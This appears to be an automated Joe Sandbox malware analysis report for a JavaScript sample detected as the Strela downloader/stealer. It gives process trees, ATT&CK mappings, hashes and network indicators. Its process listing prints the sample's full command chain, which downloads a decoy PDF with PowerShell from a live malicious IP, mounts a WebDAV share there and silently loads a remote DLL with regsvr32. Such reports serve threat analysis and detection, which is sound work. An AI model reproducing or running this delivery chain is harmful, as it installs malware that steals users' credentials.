Windows
Analysis Report
2660438432237518549.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6920 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\26604 3843223751 8549.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7120 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\209 5423475168 25.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6200 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6348 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 6664 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 1732 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 7244 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=22 64 --field -trial-han dle=1600,i ,452557560 2686680140 ,125866629 3025251154 3,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 4940 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
5% | ReversingLabs | Script-JS.Trojan.StrelaStealer |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588767 |
Start date and time: | 2025-01-11 05:16:06 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 53s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 16 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 2660438432237518549.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/2 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 2.16.168.105, 2.16.168.107, 54.224.241.105, 50.16.47.176, 34.237.241.83, 18.213.11.84, 172.64.41.3, 162.159.61.3, 2.23.242.162, 23.209.209.135, 199.232.210.172, 23.204.152.210, 23.204.152.213, 192.168.2.4, 20.109.210.53, 104.76.100.172, 13.107.246.45
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, e16604.g.akamaiedge.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
23:17:00 | API Interceptor | |
23:17:04 | API Interceptor | |
23:17:04 | API Interceptor | |
23:17:16 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 1.3073455375918177 |
Encrypted: | false |
SSDEEP: | 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr+:KooCEYhgYEL0In |
MD5: | 1E689D683E31E2EAA63CEDF9B0A85632 |
SHA1: | FA538692392961D8401F38D4F658EE03293D2FFC |
SHA-256: | 459E44F53BB86E349E6700820126DF97D6106A2605AFDD08CA8D3880067EBC34 |
SHA-512: | C2B492F250E572D45C927C02B77CDFE1484B6C025639E5F9942DF3B806A7635A2AF3E1D0BD6A9D484867C0EDBC10C386A2C435E63317596B0E2CEBFF5A221B52 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.42210693921943393 |
Encrypted: | false |
SSDEEP: | 1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO |
MD5: | 42C5A0E63A7792D3E00EE4A153C66041 |
SHA1: | 359E653DCB99D87EE7E1A38C4874707FAF696233 |
SHA-256: | B6021400BA37FCBE93EB5E4E34B1B1BA7B3A8510C15F16F4522515F3A7F59478 |
SHA-512: | C131A8FB1DBB7E7D787018417511FEE5E76858B3F3678015169F18C8D67809ED2938909AED5ADAAAA759FC0CBAA75DE925EA963BB00A63422DE83B9F89493F85 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.07540674815521967 |
Encrypted: | false |
SSDEEP: | 3:OQStEYeXOvau5ejjn13a/nlv/lillcVO/lnlZMxZNQl:OQStEzXBbj53qHGOewk |
MD5: | 0597DA112EB4ABDF6C72E58B5853EFC8 |
SHA1: | 0077670C6EDDD86F2D1285F49F357120ABE8AD00 |
SHA-256: | F727DDE7AEA5A54598426467FA8907A247DE6A3F404B73C172FCE98DD0224FE4 |
